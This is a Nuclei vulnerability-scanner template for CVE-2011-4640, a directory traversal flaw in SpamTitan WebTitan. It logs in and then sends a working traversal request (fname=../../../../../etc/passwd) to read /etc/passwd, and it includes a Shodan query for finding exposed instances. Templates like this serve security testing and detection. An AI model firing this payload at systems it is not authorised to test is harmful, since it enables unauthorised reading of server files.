nuclei-templates/http/cves/2011/CVE-2011-4640.yaml

49 lines
1.6 KiB
YAML
Raw Normal View History

2023-10-06 06:06:38 +00:00
id: CVE-2011-4640
info:
2024-02-05 05:49:39 +00:00
name: WebTitan < 3.60 - Local File Inclusion
2023-10-06 06:06:38 +00:00
author: ctflearner
severity: medium
2023-10-08 07:35:56 +00:00
description: |
Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.
2023-10-06 06:06:38 +00:00
reference:
- https://www.exploit-db.com/exploits/37943
2024-02-05 05:49:39 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2011-4640
2023-10-06 06:06:38 +00:00
classification:
2023-10-08 07:35:56 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N
cvss-score: 4
2023-10-06 06:06:38 +00:00
cve-id: CVE-2011-4640
cwe-id: CWE-22
cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:*
2024-02-05 05:49:39 +00:00
metadata:
max-request: 3
shodan-query: title:"WebTitan"
tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated
2023-10-06 06:06:38 +00:00
http:
2024-02-05 05:49:39 +00:00
- raw:
- |
GET /login-x.php HTTP/1.1
Host: {{Hostname}}
2023-10-08 07:35:56 +00:00
2024-02-05 05:49:39 +00:00
- |
POST /login-x.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
2023-10-06 06:06:38 +00:00
2024-02-05 05:52:31 +00:00
jaction=login&language=en_US&username={{username}}&password={{password}}
2024-02-05 05:49:39 +00:00
- |
GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body_2, "success\":true")'
- 'contains(body_1, "WebTitan")'
- "regex('root:.*:0:0:', body)"
- 'status_code_3 == 200'
condition: and
# digest: 4b0a00483046022100c46ba5efc4c29b483287550c5293ce4cd46bd43d4c3567276c4adafbf86876f8022100c24532b8b87d233e25b6215b612206f4bf473363805258208cd9b191ac68a08c:922c64590222798bb761d5b6d8e72950